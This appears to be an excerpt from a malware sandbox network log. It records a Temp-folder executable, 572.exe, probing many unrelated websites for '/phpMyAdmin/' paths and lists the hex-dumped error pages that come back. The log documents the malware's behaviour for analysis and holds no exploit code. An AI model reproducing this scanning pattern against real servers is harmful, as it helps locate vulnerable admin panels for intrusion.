                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC976INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store,no-cache
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                server:
                                                                                                                                                                                                                                                                                                                                                                request-context: appId=cid-v1:72342c18-c46f-45ce-b189-a032422cefba
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self';script-src 'self' 'sha256-7F67Tt3rqGzZ4RuGnAw8xbWeXLl7P0SNrI9EOIYYRdw=' 'nonce-vj3b31ZXmcuixZZGEZllBy8vGMrJQ3aG8oGiKWLE4Hw=';style-src 'self';font-src 'self' fonts.gstatic.com;img-src 'self' data: https://www.gravatar.com/avatar/;media-src 'none';object-src 'none';frame-ancestors 'self';frame-src 'self';report-uri https://uitgeverijdeviant.report-uri.com/r/t/csp/enforce
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By:
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                set-cookie: SERVERID=api02; path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC2114INData Raw: 38 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6e 6c 2d 4e 4c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 2f 61 70 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 836<!DOCTYPE html><html lang="nl-NL"> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"/> <link rel="apple-touch-icon" sizes="180x180" href="/app


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                18192.168.2.65430631.13.65.7443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC958INHTTP/1.1 400 Bad Path
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Proxy-Status: proxy_internal_response; e_isproxyerr="AcLuddse5mXFu3yrQq-TMTvQpq-oAFjwM7f6vV-DTjvdhKV8DFTDQEhUmrupfg"; e_clientaddr="AcKN0Z1g-hbEgO95KwuKScjDMEO5ktyqwEEemRKJQmkaMHd-T_GncvggOMtVF_ex3TVuD0HJIec-N7lt"; e_fb_vipport="AcKNkfvnl7xkZKpfTr5OePIQgCiW3N3QGFtxAaQdt1dRZJjBQSiQxxyJi2uP"; e_fb_vipaddr="AcLIy2awiFp3ydMZKAXHhxZS9D8vvO-bcIUigDocAcWpm_WC1f5ufQrZTTyxynqsL3CzaA"; e_fb_requesthandler="AcLev9on-Ebf9JG-TaZQMRQpcODNwfR61cIlXXF6-frMkRxDYcwIykUA0L-UFh1ZHMRdJMFkMCWpbenb"; e_fb_builduser="AcIRA8ucubz5Ri3jYnr4rXxe59VdcPW_7rqhJ4jg0IUDrNa-G2Of8CR2mZzwqjY0DTs"; e_fb_binaryversion="AcLfiBt_BlhXlexZHo-rcA4vF3MwvIFWVckYUyDRI5ypw5SGvG3QinC9xD3SEIRW6-JLI56PdMD8hHLwwrnL25zzW-LQKpf3y0g"; e_proxy="AcKnBR_Jvz8BDQfQHJrXmzPU2_EafjsrxZ36X8dO8FRgGWYEJUuVjBoWzsqh9VKM3gTYT49vJFSr8aac"
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 2959
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC1INData Raw: 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC2958INData Raw: 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 61 63 65 62 6f 6f 6b 20 7c 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="c


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                19192.168.2.6525503.141.96.53443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC113INHTTP/1.1 439 <none>
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX
                                                                                                                                                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                20192.168.2.6525493.134.125.175443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC190OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Error-Code: ERR_NGROK_3200
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 4bf33280bf5f3bd0836cbba6add9d4d1
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC937INData Raw: 39 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 65 75 63 6c 69 64 2d 73 71 75 61 72 65 2f 45 75 63 6c 69 64 53 71 75 61 72 65 2d 52 65 67 75 6c 61 72 2d 57 65 62 53 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 977<!DOCTYPE html><html class="h-full" lang="en-US" dir="ltr"> <head> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/euclid-square/EuclidSquare-Regular-WebS.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1498INData Raw: 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66 6f 6e 74 2f 77 6f 66 66 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6e 67 72 6f 6b 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 66 6f 6e 74 73 2f 69 62 6d 2d 70 6c 65 78 2d 6d 6f 6e 6f 2f 49 42 4d 50 6c 65 78 4d 6f 6e 6f 2d 54 65 78 74 49 74 61 6c 69 63 2e 77 6f 66 66 22 20 61 73 3d 22 66 6f 6e 74 22 20 74 79 70 65 3d 22 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ef="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-Text.woff" as="font" type="font/woff" crossorigin="anonymous" /> <link rel="preload" href="https://cdn.ngrok.com/static/fonts/ibm-plex-mono/IBMPlexMono-TextItalic.woff" as="font" type="f


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                21192.168.2.654623104.22.43.158443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: casinocontroller.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC231INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6d0f412439-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC202INData Raw: 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: c4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                22192.168.2.6547263.163.115.86443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:50 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: connect.appen.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC375INHTTP/1.1 404
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 766
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Content-Language: en
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 eff9b403ff1afb509ff28dd4b9bdc7f0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL58-P9
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: oWThfJ1alA3xaxiLWODa5M3FfEGIyRAgbACjLGXribVwloAIYPQFgQ==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC766INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-si


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                23192.168.2.654878172.67.170.147443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC576INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ThDNKGDSoMVOFXVBpiNJR7oFN3%2FQk82qNnXV%2BPR27TGOoecqDbiQwmPTcoqhKgxuCC2%2F21Nrg2vhpOuLzbFpJn9PlKUKJQ5oSRZmTssqaWF71lugaXxLN2LyFWfy%2FHvCfat5KXrbGu8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6d8f0d7b9c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                24192.168.2.654775170.114.52.4443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: us04web.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1303INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-zm-trackingid: v=2.0;clid=us04;rid=WEB_3bf5fc9c9ff16db8b8a5fcc02f1fb359
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests; default-src https://*.zoom.us https://zoom.us blob: 'self'; img-src https: about: blob: data: 'self'; style-src https: safari-extension: chrome-extension: 'unsafe-inline' data: 'self'; font-src https: safari-extension: chrome-extension: blob: data: 'self'; connect-src * about: blob: data: 'self'; media-src * rtmp: blob: data: 'self'; frame-src https: ms-appx-web: zoommtg: zoomus: wvjbscheme: zoomprc: data: blob: 'self'; object-src 'none'; base-uri 'none';script-src 'self' 'strict-dynamic' 'nonce-xGfoX8U0T-qMtRIqaVnNiQ' 'unsafe-inline' blob: https:;
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                x-zm-zoneid: VA2
                                                                                                                                                                                                                                                                                                                                                                content-language: en-US
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC1420INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 7a 6d 5f 68 74 6d 61 69 64 3d 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 31 30 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 75 73 30 34 5f 63 5f 39 63 6f 45 6b 55 76 41 53 52 79 6e 44 61 64 70 6a 51 45 37 35 67 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 34 42 46 44 35 45 46 32 44 41 44 36 34 32 33 41 32 38 39 36 39 44 37 37 35 32 31 41
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: _zm_ssid=us04_c_9coEkUvASRynDadpjQE75g; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: cred=4BFD5EF2DAD6423A28969D77521A
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC834INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 32 37 64 38 65 35 37 65 66 63 34 39 34 34 61 30 61 36 37 34 31 30 31 39 37 34 36 66 31 64 35 62 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 34 3a 35 31 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 7a 43 53 2e 50 6b 79 77 41 64 76 6f 4a 2e 70 6c 33 42 53 63 59 32 55 5f 64 38 7a 55 46 56 6d 6f 63 75 42 56 44 61 43 76 6a 63 67 2d 31 37 30 37 31 33 31 36 39 31 2d 31 2d 41 62 59 49 73 35 79 53 50 71 48 79 68 68 34 6a 51 75 6d 72 79 30 45 4e 34 76
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _zm_visitor_guid=27d8e57efc4944a0a6741019746f1d5b; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:14:51 GMT; Domain=zoom.us; Path=/; SecureSet-Cookie: __cf_bm=zCS.PkywAdvoJ.pl3BScY2U_d8zUFVmocuBVDaCvjcg-1707131691-1-AbYIs5ySPqHyhh4jQumry0EN4v
